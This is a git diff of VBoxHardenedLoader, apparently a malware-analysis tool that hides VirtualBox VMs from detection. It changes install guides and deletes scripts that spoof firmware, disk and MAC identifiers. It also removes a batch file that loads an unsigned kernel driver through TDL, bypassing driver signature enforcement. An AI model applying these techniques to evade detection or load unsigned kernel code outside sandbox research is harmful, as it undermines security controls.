- +Open elevated command line prompt, navigate to VBoxLdr folder and run loader with /s switch, e.g. loader.exe /s. To reenable monitoring just re-run loader without parameters elevated (as admin). Monitoring driver will be unloaded at Windows shutdown or reboot. To start it again repeat step 4. ## Warning: VirtualBox Additions 
@@ -161,40 +152,24 @@ Do not install VirtualBox Additions! This will ruin everything and there is NO w ### Appendix A: Using EFI VM -There are two ways to set your patched/custom EFI ROM for EFI VM. - -##### 1. Replace VBoxEFI64.fd with patched -During Step 3. - -* Make backup copy of original `VBoxEFI64.fd` in VirtualBox directory somewhere; -* Replace `VBoxEFI64.fd` in VirtualBox directory with it patched version from VBoxLdr\data directory. Select proper version of file and then rename it to `VBoxEFI64.fd` (e.g. you have installed 5.1.18 then select `VBoxEFI64_5.1.18.fd`); -* Use hidevm_efiahci (AHCI controller mode) or hidevm_efiide (IDE controller mode) for your EFI VM. - -##### 2. Use vboxmanage setextradata -It is the simple way, without any file replacing: -* Configure VM to use alternative EFI ROM with help of VBoxManage. +Configure VM to use alternative EFI ROM with help of VBoxManage. *vboxmanage setextradata vmname "VBoxInternal/Devices/efi/0/Config/EfiRom" full_path_to_your_patched_efirom* -e.g. *vboxmanage setextradata vm01 "VBoxInternal/Devices/efi/0/Config/EfiRom" C:\VM\PinkiPie.fd* +For example, if you are using VirtualBox 6.1.2 then + +*vboxmanage setextradata vm01 "VBoxInternal/Devices/efi/0/Config/EfiRom" C:\VBoxLdr\data\efi_amd64_fixed_6.1.2* To automate this you can add the following string to EFI vm configuration scripts + *%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/EfiRom" full_path_to_your_patched_efirom* -Note that some VirtualBox versions might not support this. +Note: configuration scripts hidevm_efiahci/hidevm_efiide already has this setting set. ### Appendix B: Uninstalling VirtualBox loader -If monitoring driver loaded - reboot Windows. Delete VBoxLdr folder. Open regedit and delete keys - ->HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tsugumi -> ->HKEY_LOCAL_MACHINE\SOFTWARE\Tsugumi - -if present. 
- -If you used patched EFI module then restore `VBoxEFI64.fd` file from backup otherwise VirtualBox will be unable to work with EFI VM's. +If monitoring driver loaded - reboot Windows. Delete VBoxLdr folder. ### Appendix C: Updating VirtualBox -Scenario: you decided update VirtualBox without clean reinstall and rebooting your PC. Will the loader work with new version? Yes it will, but you need re-run loader.exe in elevated command prompt to update patch information for new version of VirtualBox dynamic link library VBoxDD.dll. Basically you need to repeat Step 5. +Scenario: you decided update VirtualBox without clean reinstall and rebooting your PC. Will the loader work with new version? Yes it will, but you have to re-run loader.exe in elevated command prompt to update patch information for new version of VirtualBox dynamic link library VBoxDD.dll. Basically you need to repeat Step 4. diff --git a/Binary/install.cmd b/Binary/install.cmd deleted file mode 100644 index 338a640..0000000 --- a/Binary/install.cmd +++ /dev/null @@ -1,9 +0,0 @@ -REM Append full patch to tdl.exe/tsugumi.sys and run this batch file elevated -@echo off -echo Run TDL (tdl.exe tsugumi.sys) -pause -tdl.exe tsugumi.sys -echo Run loader -pause -call loader.cmd -net start vboxdrv \ No newline at end of file diff --git a/Binary/install_signed.md b/Binary/install_signed.md deleted file mode 100644 index 15f2dc7..0000000 --- a/Binary/install_signed.md +++ /dev/null 
@@ -1,204 +0,0 @@ -# Installation guide (for signed loader and driver) - -Step by step guide for VirtualBox x64 Hardened (5.1.16+) VM detection mitigation configuring. - -Contents: - - * Installing VirtualBox - * Creating VM with required settings - * Using batch script to apply fake VM system information - * Loading monitoring driver for load-in-memory VM dll patch - * Warning: VirtualBox Additions - * Appendix A: Managing monitoring driver - * Appendix B: Using EFI VM - * Appendix C: Uninstalling VirtualBox loader - * Appendix D: Updating VirtualBox - - -### Step 1. Installing VirtualBox - - -1. Download VirtualBox from official site (https://www.virtualbox.org/wiki/Downloads). -2. Do clean installation of latest VirtualBox. - * Clean mean - you must firstly uninstall any other versions of VirtualBox and reboot Windows to complete uninstallation. This ensures that no old VirtualBox files will left in system memory and on disk. Unfortunately VirtualBox setup sometimes can't do complete removal without reboot, so do reboot after uninstall. -3. Start installation and select VirtualBox components to install as shown on fugure below. - - -### Step 2. Creating VM with required setting - -In this example we are installing and configuring VirtualBox on x64 notebook with 6Gb of RAM and 4x Intel Core i7 Haswell CPU running full patch Windows 8.1. - -Create a new virtual machine (in this example it will be named "vm0") and configure it in the following way: - - - -Note: 512 Mb is not requirement, you can adjust or lower this value as you want, but keep in mind - some lame malware attempt to detect VM by available physical memory size, and if its too low - use it as VM detection flag. - -Setup Virtual disk - - - -Note: 64 Gb is not requirement however yet again some lame malware attempt to detect VM by hard disk size, so give it reasonable size. - -After VM (vm0 is our case) created, open it setting and do some changes. 
- -#### System - -On "Motherboard" tab ensure Enable I/O API is turned on. If you plan to use EFI please read Appendix B: Using EFI VM. - - - -On "Processor" tab ensure PAE/NX enabled. Also note that your VM must have at least TWO CPUs because again number of processors used by malware to determinate VM execution. So give VM at minimum two processors. - - - -On "Acceleration" tab set Paravirtualization Interface to "Legacy" and enable VT-x/Nested Paging. The "Default" paravirtualization interface give VM ability to detect VirtualBox hypervisor by "hypervisor present bit" and hypervisor name via cpuid instruction. Switching paravirtualization interface to "Legacy" effectively turns off these malware vm-detect friendly features. - - - -#### Display - -On "Screen" tab disable 3D/2D Acceleration. - - - -#### Storage - -Storage configuration would be looking like that - - - -You can use IDE controller instead of SATA, but we will be assuming that you use default SATA next. - -#### Network - -Enable NAT for virtual machine, so you can use FTP like programs to communicate with it and machine will have access to internet (if you have it). - - - -Once all settings set, press OK button. - -### Step 3. Using batch script to apply fake VM system information - -Close VirtualBox. - -Save https://github.com/hfiref0x/VBoxHardenedLoader/tree/master/Binary folder to your PC, for example we will save it as C:\VBoxLdr and use this directory next in examples. Open command line prompt (Win+R, type cmd, press Enter). Change current directory to VBoxLdr\data directory (type cd C:\VBoxLdr\data, press Enter) - -Now important part. Select script to work with it next depending on your VM configuration. 
- -> hidevm_ahci is for VM with SATA/AHCI controller and classical BIOS - -> hidevm_ide is for VM with IDE controller and classical BIOS - -> hidevm_efiahci is for VM with SATA/AHCI controller and EFI - -> hidevm_efiide is for VM with IDE controller and EFI - -If you plan to use EFI VM see "Appendix B: Using EFI VM" before doing any further steps. - -In our example we created VM without EFI support and with SATA/AHCI controller so we will use hidevm_ahci script. Open it with notepad and change the following lines: - -> set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe" -> -> set vmscfgdir=D:\Virtual\VBOX\Settings\ - -Here you see two variables used as filepaths below in script, change them to actual locations. - -Depending on where your VirtualBox installed place correct path to vboxmanage.exe in vboxman variable. Depending on where you saved Binary folder change it for vmscfgdir variable. - -In our example we will leave vboxman as is, because we didn't changed VirtualBox installation path and change D:\Virtual\VBOX\Settings\ to C:\VBoxLdr\data so both lines will look like - -> set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe" -> -> set vmscfgdir=C:\VBoxLdr\data\ - -Note the backslash at the end of vmscfgdir. - -After that save script changes. - -Type it in comand line prompt and add your VM name as parameter, e.g. in our case: - - - -Run it by pressing Enter. This will setup additional configuration for your VM. - -Do not run any VM, as it is not ready yet. - -### Step 4. Loading monitoring driver for load-in-memory VM dll patch - -Close VirtualBox if it opened. - -Open elevated command line prompt. Run cmd.exe as admin and switch current directory to C:\VBoxLdr (or where you saved Binary folder). - -##### RED ALERT -> Both driver and loader MUST be signed with valid certificate allowing loading code to kernel mode. 
Note that signed version of monitoring driver is INCOMPATIBLE with TDL and attempt to load such driver using TDL will result in BSOD. Signed loader MUST operate with signed driver and unsigned loader MUST operate with unsigned driver. - -Run loader.exe without parameters to load monitoring driver and configure it. - - - -Note: that on screenshot use different directory other than in our guide. Upon successful execution you will see here your directory name of course. - -Done, monitoring driver loaded and configured. Monitoring driver registerd in system as kernel mode service so it can be managed by standard Windows commands like "net" or "sc", for more information see "Appendix A: Managing monitoring driver" - - -## Warning: VirtualBox Additions - -Do not install VirtualBox Additions! This will ruin everything and there is NO workaround for this. - -### Appendix A: Managing monitoring driver - -List of available loader command on screenshot below: - - - -Loader provide command to stop monitoring without unloading monitoring driver. To do this run loader elevated with /s switch. E.g. loader.exe /s, re-run loader without parameters to reenable monitoring. - -Once first time installed by loader monitoring driver can be managed by "net" command. - -Use ->net start tsugumi -> ->net stop tsugumi - -to start and stop monitoring driver respectively. The "sc" tool will work too. - -### Appendix B: Using EFI VM - -There are two ways to set your patched/custom EFI ROM for EFI VM. - -##### 1. Replace VBoxEFI64.fd with patched -During Step 3. - -* Make backup copy of original `VBoxEFI64.fd` in VirtualBox directory somewhere; -* Replace `VBoxEFI64.fd` in VirtualBox directory with it patched version from VBoxLdr\data directory. Select proper version of file and then rename it to `VBoxEFI64.fd` (e.g. you have installed 5.1.18 then select `VBoxEFI64_5.1.18.fd`); -* Use hidevm_efiahci (AHCI controller mode) or hidevm_efiide (IDE controller mode) for your EFI VM. - -##### 2. 
Use vboxmanage setextradata -It is the simple way, without any file replacing: -* Configure VM to use alternative EFI ROM with help of VBoxManage. - -*vboxmanage setextradata vmname "VBoxInternal/Devices/efi/0/Config/EfiRom" full_path_to_your_patched_efirom* - -e.g. *vboxmanage setextradata vm01 "VBoxInternal/Devices/efi/0/Config/EfiRom" C:\VM\PinkiPie.fd* - -To automate this you can add the following string to EFI vm configuration scripts -*%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/EfiRom" full_path_to_your_patched_efirom* - -Note that some VirtualBox versions might not support this. - -### Appendix C: Uninstalling VirtualBox loader - -If monitoring driver loaded - reboot Windows. Delete VBoxLdr folder. Open regedit and delete keys - ->HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tsugumi -> ->HKEY_LOCAL_MACHINE\SOFTWARE\Tsugumi - -if present. - -If you used patched EFI module then restore `VBoxEFI64.fd` file from backup otherwise VirtualBox will be unable to work with EFI VM's. - -### Appendix D: Updating VirtualBox - -Scenario: you decided update VirtualBox without clean reinstall and rebooting your PC. Will the loader work with new version? Yes it will, but you need re-run loader.exe in elevated command prompt to update patch information for new version of VirtualBox dynamic link library VBoxDD.dll. Close VirtualBox if it opened. Open command line prompt elevated, change current directory to VBoxLdr and run loader.exe from it. diff --git a/Binary/linux.md b/Binary/linux.md index 55c32d0..6d1b26e 100644 --- a/Binary/linux.md +++ b/Binary/linux.md 
@@ -2,16 +2,12 @@ Although this loader was initially created for use with Windows VirtualBox versi Patching VirtualBox on Linux -http://www.kernelmode.info/forum/viewtopic.php?p=29627#p29627 +https://www.kernelmode.info/forum/viewtopicd7bf.html?f=11&t=3478&start=100#p29030 More vboxmanage converted scripts examples https://github.com/hfiref0x/VBoxHardenedLoader/issues/9 -Post about VirtualBox recompilation - -http://www.kernelmode.info/forum/viewtopic.php?p=29030#p29030 - Example patched files for 5.1.16 deb package version -http://www.kernelmode.info/forum/viewtopic.php?p=29627#p29632 +https://www.kernelmode.info/forum/viewtopic5ec6-2.html?f=11&t=3478&start=150#p29632 \ No newline at end of file diff --git a/Binary/linux/ACPI-DSDT.bin b/Binary/linux/ACPI-DSDT.bin deleted file mode 100644 index 9337f9e..0000000 Binary files a/Binary/linux/ACPI-DSDT.bin and /dev/null differ diff --git a/Binary/linux/ACPI-SSDT1.bin b/Binary/linux/ACPI-SSDT1.bin deleted file mode 100644 index 76f54cd..0000000 Binary files a/Binary/linux/ACPI-SSDT1.bin and /dev/null differ diff --git a/Binary/linux/modifyvm-BIOS b/Binary/linux/modifyvm-BIOS deleted file mode 100644 index d7fed5e..0000000 --- a/Binary/linux/modifyvm-BIOS +++ /dev/null 
@@ -1,51 +0,0 @@
-#!/bin/sh
-vboxmanage setextradata $1 "VBoxInternal/CPUM/EnableHVP" 0
-
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "08/10/13"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMajor" "5"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMinor" "9"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMajor" "1"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMinor" "0"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiSystemProduct" "MacBook5,2"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVersion" "1.0"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSerial" "CSN12345678901234567"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSKU" "FM550EA#ACB"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiSystemFamily" "Ultrabook"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBoardProduct" "Mac-F22788AA"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVersion" "3.0"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBoardSerial" "BSN12345678901234567"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBoardLocInChass" "Board Loc In"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBoardBoardType" 10
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiChassisType" 10
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVersion" "Mac-F22788AA"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiChassisSerial" "CSN12345678901234567"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiChassisAssetTag" "Apple"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A"
-
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port0/ModelNumber" "Hitachi HTS543232A7A384"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port0/FirmwareRevision" "ES2OA60W"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port0/SerialNumber" "2E3024L1T2V9KA"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ModelNumber" "Slimtype DVD A DS8A8SH"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/FirmwareRevision" "KAA2"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/SerialNumber" "ABCDEF0123456789"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIVendorId" "Slimtype"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIProductId" "DVD A DS8A8SH"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIRevision" "KAA2"
-
-vboxmanage setextradata $1 "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "APPLE"
-vboxmanage setextradata $1 "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "/home/vmadmin/DATA/WHTMP/vm/ACPI-DSDT.bin"
-vboxmanage setextradata $1 "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "/home/vmadmin/DATA/WHTMP/vm/ACPI-SSDT1.bin"
-vboxmanage setextradata $1 "VBoxInternal/Devices/vga/0/Config/BiosRom" "/home/vmadmin/DATA/WHTMP/vm/videorom.bin"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "/home/vmadmin/DATA/WHTMP/vm/pcbios.bin"
-vboxmanage modifyvm $1 --macaddress1 6CF0491A6E83
-
-vboxmanage modifyvm $1 --bioslogoimagepath "/home/vmadmin/DATA/WHTMP/vm/splash.bmp"
-
diff --git a/Binary/linux/modifyvm-EFI b/Binary/linux/modifyvm-EFI
deleted file mode 100644
index 65bb491..0000000
--- a/Binary/linux/modifyvm-EFI
+++ /dev/null
@@ -1,50 +0,0 @@
-#!/bin/sh
-vboxmanage setextradata $1 "VBoxInternal/CPUM/EnableHVP" 0
-
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBIOSVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseDate" "08/10/13"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMajor" "5"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMinor" "9"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMajor" "1"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMinor" "0"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiSystemVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "MacBook5,2"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiSystemSerial" "CSN12345678901234567"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiSystemSKU" "FM550EA#ACB"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiSystemFamily" "Ultrabook"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBoardVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Mac-F22788AA"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBoardVersion" "3.0"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBoardSerial" "BSN12345678901234567"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBoardLocInChass" "Board Loc In"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBoardBoardType" 10
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiChassisVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiChassisType" 10
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiChassisVersion" "Mac-F22788AA"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiChassisSerial" "CSN12345678901234567"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiChassisAssetTag" "Apple"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A"
-
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port0/ModelNumber" "Hitachi HTS543232A7A384"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port0/FirmwareRevision" "ES2OA60W"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port0/SerialNumber" "2E3024L1T2V9KA"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ModelNumber" "Slimtype DVD A DS8A8SH"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/FirmwareRevision" "KAA2"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/SerialNumber" "ABCDEF0123456789"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIVendorId" "Slimtype"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIProductId" "DVD A DS8A8SH"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIRevision" "KAA2"
-
-vboxmanage setextradata $1 "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "APPLE"
-vboxmanage setextradata $1 "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "/home/vmadmin/DATA/WHTMP/vm/ACPI-DSDT.bin"
-vboxmanage setextradata $1 "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "/home/vmadmin/DATA/WHTMP/vm/ACPI-SSDT1.bin"
-vboxmanage setextradata $1 "VBoxInternal/Devices/vga/0/Config/BiosRom" "/home/vmadmin/DATA/WHTMP/vm/videorom.bin"
-vboxmanage modifyvm $1 --macaddress1 6CF0491A6E83
-
-vboxmanage modifyvm $1 --bioslogoimagepath "/home/vmadmin/DATA/WHTMP/vm/splash.bmp"
-
diff --git a/Binary/linux/pcbios.bin b/Binary/linux/pcbios.bin
deleted file mode 100644
index 8c57720..0000000
Binary files a/Binary/linux/pcbios.bin and /dev/null differ
diff --git a/Binary/linux/pxerom.bin b/Binary/linux/pxerom.bin
deleted file mode 100644
index 15cb3d5..0000000
Binary files a/Binary/linux/pxerom.bin and /dev/null differ
diff --git a/Binary/linux/readme.txt b/Binary/linux/readme.txt
deleted file mode 100644
index bbb73e0..0000000
--- a/Binary/linux/readme.txt
+++ /dev/null
@@ -1 +0,0 @@
-https://github.com/hfiref0x/VBoxHardenedLoader/blob/master/Binary/linux.md
\ No newline at end of file
diff --git a/Binary/linux/splash.bmp b/Binary/linux/splash.bmp
deleted file mode 100644
index d2fad1a..0000000
Binary files a/Binary/linux/splash.bmp and /dev/null differ
diff --git a/Binary/linux/videorom.bin b/Binary/linux/videorom.bin
deleted file mode 100644
index fa84812..0000000
Binary files a/Binary/linux/videorom.bin and /dev/null differ
diff --git a/Binary/loader.cmd b/Binary/loader.cmd
deleted file mode 100644
index 7944bbb..0000000
--- a/Binary/loader.cmd
+++ /dev/null
@@ -1,4 +0,0 @@
-REM Append full patch to loader.exe and run this batch file elevated
-@echo
-echo Running loader
-loader.exe
diff --git a/Binary/loader.exe b/Binary/loader.exe index 18fef99..08d4f01 100644 Binary files a/Binary/loader.exe and b/Binary/loader.exe differ diff --git a/Binary/patchgen/kasumi.exe b/Binary/patchgen/kasumi.exe deleted file mode 100644 index 821162b..0000000 Binary files a/Binary/patchgen/kasumi.exe and /dev/null differ diff --git a/Binary/support.txt b/Binary/support.txt new file mode 100644 index 0000000..472fc98 --- /dev/null +++ b/Binary/support.txt @@ -0,0 +1,3 @@ +# Support and donations + +VBoxHardenedLoader is Free Software and is made available free of charge. Your donation, which is purely optional, supports project development and maintaining. If you like the software, you can consider donation which you can do anonymously using the following BTC address: 3DU68VrwZYHVSYXenQMG123utkYrFGms3b diff --git a/Binary/tdl.exe b/Binary/tdl.exe deleted file mode 100644 index 0d8cfef..0000000 Binary files a/Binary/tdl.exe and /dev/null differ diff --git a/LICENSE.md b/LICENSE.md index 18d85d9..9f810d8 100644 --- a/LICENSE.md +++ b/LICENSE.md @@ -1,4 +1,4 @@ -Copyright (c) 2014 - 2018, VBoxHardenedLoader authors +Copyright (c) 2014 - 2020, VBoxHardenedLoader authors Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: diff --git a/README.md b/README.md index 88a5943..521ea32 100644 --- a/README.md +++ b/README.md 
@@ -2,21 +2,20 @@ # VirtualBox Hardened Loader ## VirtualBox Hardened VM detection mitigation loader -For step by step guide further info see - -https://github.com/hfiref0x/VBoxHardenedLoader/blob/master/Binary/install.md - -If you compiled signed version of loader and driver +# System Requirements -https://github.com/hfiref0x/VBoxHardenedLoader/blob/master/Binary/install_signed.md ++ x64 Windows 7/8/8.1/10; ++ VirtualBox 6.1.2 and later versions; ++ Administrative privilege is required. -# System Requirements +WARNING: This loader is incompatible with any VirtualBox below 6.1.2. -x64 Windows 7/8/8.1/10; +For version below VirtualBox 6.1.2 please use older release of this loader. -VirtualBox 6.0.0 and later versions. +More about key changes in loader version 2.0 you can read here https://swapcontext.blogspot.com/2020/02/vboxhardenedloader-v2.html -For version below VirtualBox 6.0 please use older release of this loader. ++ For versions 6.0.x use loader version 1.10.0 +(https://github.com/hfiref0x/VBoxHardenedLoader/releases/tag/v1.10.0) + For versions 5.2.x use loader version 1.9.0 (https://github.com/hfiref0x/VBoxHardenedLoader/releases/tag/v1.9.0) 
@@ -27,41 +26,29 @@ For version below VirtualBox 6.0 please use older release of this loader. + For versions 5.0.0, 5.0.2, 5.0.8, 5.0.10, 5.0.12 use loader version 1.7.1 (https://github.com/hfiref0x/VBoxHardenedLoader/releases/tag/v1.7.1) -Loader designed only for x64 Windows. - -Administrative privilege is required. - -# Warning -Binary files (ACPI tables, BIOS roms), batch scripts from loader version 1.9+ are NOT compatible with VirtualBox 5.1 and below. - -# Oracle bug warning for VirtualBox 6.0.0 -VirtualBox version 6.0.0 contain a bug that causes any EFI enabled guest to show black screen with any type of virtual display adapter other than VBoxVGA which is _not default_ setting (except the case when VM is created for old OS variants). If you want set the EFI option for guest, you should also go to Display settings and change video adapter type to VBoxVGA manually. - -# Installation and use -For unsingned loader version (this is default version shipped on github) -+ See README.txt in Binary directory for more info. +# Installation and use guide -For singed loader version -+ See README_SIGNED.txt in Binary directory for more info. +https://github.com/hfiref0x/VBoxHardenedLoader/blob/master/Binary/howto.md # Build Project comes with full source code. In order to build from source you need: -1) Microsoft Visual Studio 2013 U4 and/or Visual Studio 2015/2017 for loader build. -2) Windows Driver Kit 8.1 U1 and later versions for driver build. +1) Microsoft Visual Studio 2019 for loader build. +2) Windows Driver Kit 8.1/10 and later versions for driver build. ## Instructions * Select Platform ToolSet first for project in solution you want to build (Project->Properties->General): * v120 for Visual Studio 2013; * v140 for Visual Studio 2015; - * v141 for Visual Studio 2017. + * v141 for Visual Studio 2017; + * v142 for Visual Studio 2019. 
* For v140 and above set Target Platform Version (Project->Properties->General): - * If v140 then select 8.1 (Note that Windows 8.1 SDK must be installed); - * If v141 then select 10.0.17763.0 (Note that Windows 10.0.17763 SDK must be installed). + * If v140 then select 8.1; + * If v141/v142 then select 10. # Project Contents 
@@ -72,27 +59,22 @@ Purpose: patch VirtualBox dlls in runtime. **Zekamashi - application, x64** -Purpose: set registry patch data for Tsugumi driver, notify monitoring driver about patch data change, stop monitoring. Controls driver behavior by sending Tsugumi requests from loader command line. Type loader /? in command line to view built-in help about supported commands and their syntax. +Purpose: load Tsugumi monitoring driver, stop monitoring. Type loader /? in command line to view built-in help about supported commands and their syntax. -Since 1.8 version loader has integrated patch generator and it will attempt to generate patch table for currently installed VirtualBox version. -**Kasumi - application, x64** - -Purpose: auxiliary utiliy to generate patch tables from VirtualBox VBoxDD dlls, generated table then can be used as input file to loader (Zekamashi). - -> **Usage:** kasumi vboxdd_filename, for example: kasumi C:\Program Files\Oracle\VirtualBox\VBoxDD.dll - -Not required for VBoxHardenedLoader work. Since 1.8 version integrated to Zekamashi loader and works automatically. +# Linux support +https://github.com/hfiref0x/VBoxHardenedLoader/blob/master/Binary/linux.md -# Code Signing -See CodeSigning.txt in Source directory for more info. +# Support and donations -# Linux support +VBoxHardenedLoader is Free Software and is made available free of charge. +Your donation, which is purely optional, supports project development and maintaining. +If you like the software, you can consider donation which you can do anonymously using the following BTC address -https://github.com/hfiref0x/VBoxHardenedLoader/blob/master/Binary/linux.md +* 3DU68VrwZYHVSYXenQMG123utkYrFGms3b # Authors -(c) 2014 - 2019 VBoxHardenedLoader Project +(c) 2014 - 2020 VBoxHardenedLoader Project diff --git a/Source/CodeSigning.txt b/Source/CodeSigning.txt deleted file mode 100644 index c15a6b4..0000000 --- a/Source/CodeSigning.txt +++ /dev/null 
@@ -1,28 +0,0 @@
-Both loader and monitor driver projects support code signing.
-
-To compile code signing friendly version use "ReleaseSigned" configuration.
-
-The difference with "Release" configuration is in included Post Build Event for signing, additional linker option /INTEGRITYCHECK and identifier _SIGNED_BUILD is set which is controlling some code behavior in loader and driver.
-
-More info https://msdn.microsoft.com/en-us/library/dn195769.aspx
-
-Certificate for kernel mode code signing required.
-
-To customize/configure code signing process go to Project Properties -> Build Events -> Post Build Event.
-
-Example of code signing batch file
-"signtool.exe" sign /sha1 CERTIFICATE_HASH /ac CERTIFICATE_PATH /ph /fd SHA256 /v /tr http://sha256timestamp.ws.symantec.com/sha256/timestamp %1
-
